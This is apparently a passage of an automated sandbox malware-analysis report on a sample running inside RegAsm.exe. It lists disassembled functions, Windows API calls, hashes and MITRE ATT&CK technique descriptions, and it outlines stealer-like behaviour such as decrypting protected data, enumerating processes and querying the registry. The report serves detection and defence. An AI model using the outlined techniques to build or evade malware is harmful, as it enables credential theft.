Associated: 00000018.00000002.2955705176.00000000200CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1fe80000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: 48ec17f09d8df5fb424386c0ee0038b95ec3c01491cb929d51ac0a2dab1c093c
Instruction ID: 8274df33ce5e09ef7ac0459eefdc764557363bd879029c40e3f1092c01271c49
Opcode Fuzzy Hash: 48ec17f09d8df5fb424386c0ee0038b95ec3c01491cb929d51ac0a2dab1c093c
Instruction Fuzzy Hash: D3412472604345ABD300EF64CD80A6BB7A9FFC4214F84092DF74987651E731F91987E2

Function 00408203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00630D28,0000FFFF), ref: 00408220
SetEnvironmentVariableA.KERNEL32(00000000), ref: 00408294
LoadLibraryA.KERNEL32 ref: 004082A8

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00408215, 00408229, 0040823F

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: EnvironmentVariable$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2534594481-3463377506
Opcode ID: f0390cdb18f5746b4250f8a0f1e7be06f71d182ddb625fccb11439b915a417aa
Instruction ID: 84292c169819be5b53b0aa043c90a357ac7ef937680942749e622d56a9f64c6e
Opcode Fuzzy Hash: f0390cdb18f5746b4250f8a0f1e7be06f71d182ddb625fccb11439b915a417aa
Instruction Fuzzy Hash: 91413931905245DFEB05EBA1FD66AE937B6FB04305F20612EE901A12F1DF395988CF98

Function 004073D6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(;q@,;q@,00003000,00000040), ref: 00407474
VirtualAlloc.KERNEL32(00000000,;q@,00003000,00000040), ref: 004074BF

Strings

;q@, xrefs: 00407466, 00407470, 004074B9, 004074D7, 0040742C, 00407469, 00407473, 004074BC
;q@, xrefs: 004073DC

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: ;q@$;q@
API String ID: 4275171209-3893597124
Opcode ID: ce50d067a10a9d200ba21eaef60b552f8d4fc485bf38c75f1e0756368e75d6fe
Instruction ID: d3bad8f71399132065eca503ffa06903ce5ef1b7e5e995e1b9bcc650a41b767e
Opcode Fuzzy Hash: ce50d067a10a9d200ba21eaef60b552f8d4fc485bf38c75f1e0756368e75d6fe
Instruction Fuzzy Hash: D941B535A04209EFCB50CF98C485FADBBF0EB08364F1484A5E959EB391D734EA81CB45

Function 0041246A Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 00411668: lstrcpy.KERNEL32(?,00000000), ref: 004116A7

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412491
Process32First.KERNEL32(?,00000128), ref: 004124A4
Process32Next.KERNEL32(?,00000128), ref: 004124B8

Part of subcall function 0041185B: lstrlen.KERNEL32(?), ref: 0041186F
Part of subcall function 0041185B: lstrcpy.KERNEL32(00000000,?), ref: 004118A8
Part of subcall function 0041185B: lstrcat.KERNEL32(00000000,00000000), ref: 004118B4

Part of subcall function 0041177A: lstrcpy.KERNEL32(00000000,00418D35), ref: 004117D3

CloseHandle.KERNEL32(?), ref: 00412525

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: edef281f5cc5dd152aa9e67e80f9c8b0791c616a4bd466e40f1cbc3d3201eaa1
Instruction ID: 2c0229d212547161a0eb93f3d0d5d82303ca8f07f9ab92fbeb1aaa96aca691bd
Opcode Fuzzy Hash: edef281f5cc5dd152aa9e67e80f9c8b0791c616a4bd466e40f1cbc3d3201eaa1
Instruction Fuzzy Hash: CC212935900118EBCB11EB60DD56AEDB379AF15309F5041EAA60AB61A0EF349FC8CF94

Function 00411B5B Relevance: 6.0, APIs: 4, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411B6F
RtlAllocateHeap.NTDLL(00000000), ref: 00411B76
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00411B06), ref: 00411B95
RegQueryValueExA.KERNEL32(00411B06,00429280,00000000,00000000,?,000000FF), ref: 00411BB2

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: fa2294ccabacd92873ac69c0120d4362d7865d6ccd1858eb0f0302cf3e886bee
Instruction ID: 29d7a5e80dbd030fd5711505aedc04f660bf528dc6b38352957baa02463c1007
Opcode Fuzzy Hash: fa2294ccabacd92873ac69c0120d4362d7865d6ccd1858eb0f0302cf3e886bee
Instruction Fuzzy Hash: 42F04F75A40209FFEB00AFE0EC0AFEDBBB9FB05704F101095F200A90A1D7B05690DB54

Function 00411EB5 Relevance: 6.0, APIs: 4, Instructions: 32memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411EC9
RtlAllocateHeap.NTDLL(00000000), ref: 00411ED0
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?), ref: 00411EEF
RegQueryValueExA.KERNEL32(?,00000000,00000000,?,000000FF), ref: 00411F0D

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: dd008c8d00355dc8994383d20b0c3b1a5372c3a3245a183f1dace59f39d50ce9
Instruction ID: 2ba135963ef3e1c949db86b07d2e2a79437377d0b90cfecc595d9e25d7200812
Opcode Fuzzy Hash: dd008c8d00355dc8994383d20b0c3b1a5372c3a3245a183f1dace59f39d50ce9
Instruction Fuzzy Hash: C2F03A79A40208FFEB10AFE0EC0AF9DBBBAFB06745F105064F701A91A0D77156949F40

Function 00411CBF Relevance: 6.0, APIs: 4, Instructions: 31memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411CCF
RtlAllocateHeap.NTDLL(00000000), ref: 00411CD6
GetTimeZoneInformation.KERNEL32(?), ref: 00411CE9
wsprintfA.USER32 ref: 00411D20

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 203e413fed742de3b00b513deca226d0cff61aa8e2789412112a4631cc96891a
Instruction ID: daf70193e9c0513ecb3072794c83a438d37f7fdfa3376bc861271b49892c1553
Opcode Fuzzy Hash: 203e413fed742de3b00b513deca226d0cff61aa8e2789412112a4631cc96891a
Instruction Fuzzy Hash: 2BF0BE70A003289FDB20AB24FC0AB9977BBBB02345F1001D5F209AA2E0D7749EC0CF02

Function 0040F9BD Relevance: 4.7, APIs: 3, Instructions: 166COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000), ref: 0040F9EF
StrCmpCA.SHLWAPI(00000000), ref: 0040FA75
StrCmpCA.SHLWAPI(00000000), ref: 0040FB84
StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD

Memory Dump Source

Source File: 00000018.00000002.2939946030.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_40e000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b8a1da7fd89a2fa00279e96b0205e73d263629bb26544e0686e6a6ba6825295
Instruction ID: 7cd2c182165b9fee31fd49b72ff1b8ad9c7a36b01791bf89c52de0b726780448
Opcode Fuzzy Hash: 7b8a1da7fd89a2fa00279e96b0205e73d263629bb26544e0686e6a6ba6825295
Instruction Fuzzy Hash: CD511271A00109ABCF14FBB5DD96BDD77B9BB60304F10402AE906EB1A1EE35DB49CB85

Function 00412213 Relevance: 4.6, APIs: 3, Instructions: 52registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00412259
wsprintfA.USER32 ref: 0041228B
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,00000000), ref: 004122AC
RegQueryValueExA.KERNEL32(00000000,00000000,000F003F,?,00000400), ref: 0041231A
lstrlen.KERNEL32(?), ref: 0041232F
RegQueryValueExA.KERNEL32(00000000,00000000,000F003F,?,00000400,00000000,00000000), ref: 004123C6

Part of subcall function 004116B4: lstrcpy.KERNEL32(?,00418CE8), ref: 004116F4

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID:
API String ID: 3471882850-0
Opcode ID: bbd5619e32fb66a04eb2561889dba601567823bce0b89b8c9f289f1227c0a173
Instruction ID: d7cee1983acf12d4360d724bf4cc3a4c29cf8c0d886bd7a19f0679c37ebee969
Opcode Fuzzy Hash: bbd5619e32fb66a04eb2561889dba601567823bce0b89b8c9f289f1227c0a173
Instruction Fuzzy Hash: 1721F27590012CAFEB609B50DD45BD9B7B9FF08304F4094E5E649A60A0CF749AD98F94

Function 00413563 Relevance: 4.5, APIs: 3, Instructions: 25COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00413576
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00413596
CloseHandle.KERNEL32(00000000), ref: 0041359F

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 9803f6feafe89f41091f50d82cb4339e1f15d5ace7d5a513b4bec1d00fd740cc
Instruction ID: 648301d2c24216510959a40647cebe15a857575c5a4660e0673f59272e1cdbeb
Opcode Fuzzy Hash: 9803f6feafe89f41091f50d82cb4339e1f15d5ace7d5a513b4bec1d00fd740cc
Instruction Fuzzy Hash: 68F0F27890120CFFDB11EFA0DC0AFDC7BB9AB09709F1444A5B615AA1A0D7B1ABD4DB44

Function 00407902 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00EBE9FC,458B0874,00000002,00000002), ref: 004079D0

Strings

@, xrefs: 004079AC

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 287ad8346a7fe6e5c9c93bd88e2f49757a3d10b5b68bd008e028ca123d1bf971
Instruction ID: 108c03afaf6488205a77675aa431fcd5872e35c29fe2ccaab908e516a6f44892
Opcode Fuzzy Hash: 287ad8346a7fe6e5c9c93bd88e2f49757a3d10b5b68bd008e028ca123d1bf971
Instruction Fuzzy Hash: 2D31CBB5D08209EFEB10CF98C545BADBBF1FB04304F1485A6D455AB391D378AA81DF46

Function 1FEB04D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 1FEB04E7

Memory Dump Source

Source File: 00000018.00000002.2953499666.000000001FE88000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FE80000, based on PE: true

Associated: 00000018.00000002.2953459143.000000001FE80000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000001FE81000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000001FFE6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000002008D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955355624.000000002008F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955652796.00000000200C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1fe80000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: db5da4c041f54d61c015802474020ab5712145677a20efbe33aeb47d233236f1
Instruction ID: 9f1633a81b791cc12357f0628281b0ee5154eefe3376180fc59a297858cf19bc
Opcode Fuzzy Hash: db5da4c041f54d61c015802474020ab5712145677a20efbe33aeb47d233236f1
Instruction Fuzzy Hash: B9D01236E8C72263D61126D0BC01ACA7F419B606A1F064039FE8C59224D655B99193D2

Function 004070D4 Relevance: 3.1, APIs: 2, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2366539d3be503051b00187bea4600bca2c65446fc7f1bc272f184ee414bc3d7
Instruction ID: a860d7bb49b00275ae4f9f6a4a51eaec01057512aeaaa0d5d6857e8719e4b74b
Opcode Fuzzy Hash: 2366539d3be503051b00187bea4600bca2c65446fc7f1bc272f184ee414bc3d7
Instruction Fuzzy Hash: FA61D270C08209EFCF14DF94D948BEEB7B0AB04315F2044AAE405B7291D779AE94DF6A

Function 00418C65 Relevance: 3.1, APIs: 2, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 00418C99
StrCmpCA.SHLWAPI(00000000,00428D8C,00000000), ref: 00418D4B

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 234d26ecafc294e67f33a77f1ce478bab680e60a171974648da5cb8a089b8979
Instruction ID: 4cb9426ee5e73f282c12afd8d592c338adc4812851f741afb7acd22160182d69
Opcode Fuzzy Hash: 234d26ecafc294e67f33a77f1ce478bab680e60a171974648da5cb8a089b8979
Instruction Fuzzy Hash: 6B3184B1E10204ABCF00EBA5DD46AEE7778FB15318F10051AF502E73A1DB389940CBA9

Function 00407F8E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000), ref: 00407D05
Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00407D6E
Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9

StrStrA.SHLWAPI(00000000,00428E20), ref: 00407FDF

Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(00406095,00000000,00000001,00000000,?,00000000,00000000), ref: 00407DE6
Part of subcall function 00407DC2: LocalAlloc.KERNEL32(00000040,?,?,?,00406095), ref: 00407DF7
Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(00406095,00000000,00000001,?,?,00000000,00000000), ref: 00407E1D
Part of subcall function 00407DC2: LocalFree.KERNEL32(?,?,?,00406095), ref: 00407E31

Part of subcall function 00407E41: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407E65
Part of subcall function 00407E41: LocalAlloc.KERNEL32(00000040,00000000), ref: 00407E83
Part of subcall function 00407E41: LocalFree.KERNEL32(?), ref: 00407EAB

Strings

, xrefs: 00408062

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Local$AllocCryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotect
String ID:
API String ID: 1885156282-3916222277
Opcode ID: bef0cce96c9305b235001981c3137328ee111aaf2a8ccb2ce87ed8705f0e8377
Instruction ID: 8d589a117900b415cc4759a7c5c28772ff61d9ce457947e60a2fc3858aeb04fe
Opcode Fuzzy Hash: bef0cce96c9305b235001981c3137328ee111aaf2a8ccb2ce87ed8705f0e8377
Instruction Fuzzy Hash: 74310E71D0010DABDF11DBA5DD45BEEBBB8AF04304F14012AE840B2291EB799A58DB99

Function 004090FB Relevance: 2.7, APIs: 2, Instructions: 196stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 004092EF
lstrlen.KERNEL32(00000000), ref: 00409303

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 13bc90aa3946fad34e7f83020770b8e416f77cd20ff7e1e4844d712582c21817
Instruction ID: e682058c765c3eed9424c7c912d02b9114c1685d086e83408ab55d0a98466556
Opcode Fuzzy Hash: 13bc90aa3946fad34e7f83020770b8e416f77cd20ff7e1e4844d712582c21817
Instruction Fuzzy Hash: 1E71EC729101189ADF04FBA1DCA6DEE7379BF14305F50412EF616A21F1EE399A88CB94

Function 00417E48 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 004116B4: lstrcpy.KERNEL32(?,00418CE8), ref: 004116F4

StrCmpCA.SHLWAPI(00000000,00428D8C), ref: 00417E8B

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e6a4de163c571369f9637e5314a02b717f6a537af485989cc83e18c5039fe51e
Instruction ID: b6725acd924a18acdeaf76a85a33531c260c99ef83c6fe063ac976ef0ea738d9
Opcode Fuzzy Hash: e6a4de163c571369f9637e5314a02b717f6a537af485989cc83e18c5039fe51e
Instruction Fuzzy Hash: 4B11D0319101089BCB14FFA2E8569DD7378AF50309F50412EF916971F2EF39AB48C788

Function 00418E9E Relevance: 1.5, APIs: 1, Instructions: 45sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00007C65,?,00000000,00000000), ref: 00418E85
Sleep.KERNEL32(000003E8,?,00000000,?,?), ref: 00418EA5

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: 77cb6d2298c55223a179d1aa037e46e19616f81f59ff4a321708ed1b89047357
Instruction ID: 5657c23587d86dbe871ff5d5566c82c5f00d4f8eb17df63da99cc315ca23b86c
Opcode Fuzzy Hash: 77cb6d2298c55223a179d1aa037e46e19616f81f59ff4a321708ed1b89047357
Instruction Fuzzy Hash: 52011774640204EBDB21EF21DC46BEC3B65BB11709F54412AF9169A1B1DB399A82CF89

Function 00412F4C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00412F5B

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f1a559543597f494e702d73d63101f9eff4698bd0b51bed46134b28d3630c21a
Instruction ID: 5a9ed636e313f6a7dd176774e2c6308ea72efcd30315a16af32adb4bfda7ee87
Opcode Fuzzy Hash: f1a559543597f494e702d73d63101f9eff4698bd0b51bed46134b28d3630c21a
Instruction Fuzzy Hash: 4CF0C074C1020CEBCB00DFA5D5456DDB774AB11359F108156E522E72A0E7789B96DF44

Function 00412667 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674

Part of subcall function 00411668: lstrcpy.KERNEL32(?,00000000), ref: 004116A7

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: CurrentProfilelstrcpy
String ID:
API String ID: 2831436455-0
Opcode ID: cf87c277a733e5221764779a6e2ad4feef4a113438a1652cc2c7087e749b97bc
Instruction ID: 79ae12f52d30196ee2c5170817a78a3de43ea3cd72a751e4cea9930dc4e20eb0
Opcode Fuzzy Hash: cf87c277a733e5221764779a6e2ad4feef4a113438a1652cc2c7087e749b97bc
Instruction Fuzzy Hash: 0CE04F30600108EFCF10EF65D881EDD37ACBB04788F50402AF905D7190DB74E995CB98

Function 00404239 Relevance: 1.3, APIs: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040234D,004257D0,004257E0,0000000F), ref: 00404246

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: b2908c616810051979d5b7c1935cb1d71aeefb77bac9279ab48edbe17b9693c0
Instruction ID: 15c8a1cfb45bc9c132fd9fd4faededd5fc4f4c62c30039555f1f88a1b54c1e58
Opcode Fuzzy Hash: b2908c616810051979d5b7c1935cb1d71aeefb77bac9279ab48edbe17b9693c0
Instruction Fuzzy Hash: 9A213071785268AFDB04EBE9F8C7B5CBBE4EFD4714FA0006FF40496191DEB869408619

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
